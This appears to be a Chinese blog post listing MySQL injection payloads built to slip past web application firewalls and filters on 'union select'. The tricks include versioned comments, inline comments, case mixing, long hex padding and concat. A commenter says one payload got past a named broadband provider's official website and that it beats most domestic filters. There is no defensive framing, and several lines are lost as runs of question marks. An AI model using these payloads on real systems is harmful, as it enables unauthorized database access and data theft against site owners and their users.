mysql 注射绕过语法

id=-1+/*!uNioN*/+/*!SelEct*/+1,2,3,4--+
id=1/**/union/**/select/**/+1,2,3,4--+ 这个貌似没什么用。。
id=-1 and (select 1)=(select 0xAAA
AAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA
AAA mores)+/*!union*/+/*!SeleCt*/
+1,2,3,4--+  应该是对特定的系统。。。 具体不怎么清楚
id=-1+concat(u,n,i,o,n)+concat(s,
e,l,e,c,t)+all+1,2,3,4--+  没测试过

id=-1+uni/**/on+Sel/**/Ect+1
,2,3,4--+

??????????????????????????????????

???????????????????????????????

?????????????????????????????????

????????????????????????????

?????????

r00t注释:

过滤union select的时候必备啊~ 这都看不懂 我也木办法了

用此语法绕过长城宽带官网

id=-1 and (select 1)=(select 
0xAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA mores)+/*!union*/+/*!Sele
Ct*/+1,2,3,4--+

 

此语法秒杀国内70%以上过滤~

???????????????????????????????????

????????????????

????????????????????????????????

?????????????????????

???????????????????????????????

fr0m:007 Team

7

Comments

发表评论

电子邮件地址不会被公开。 必填项已用*标注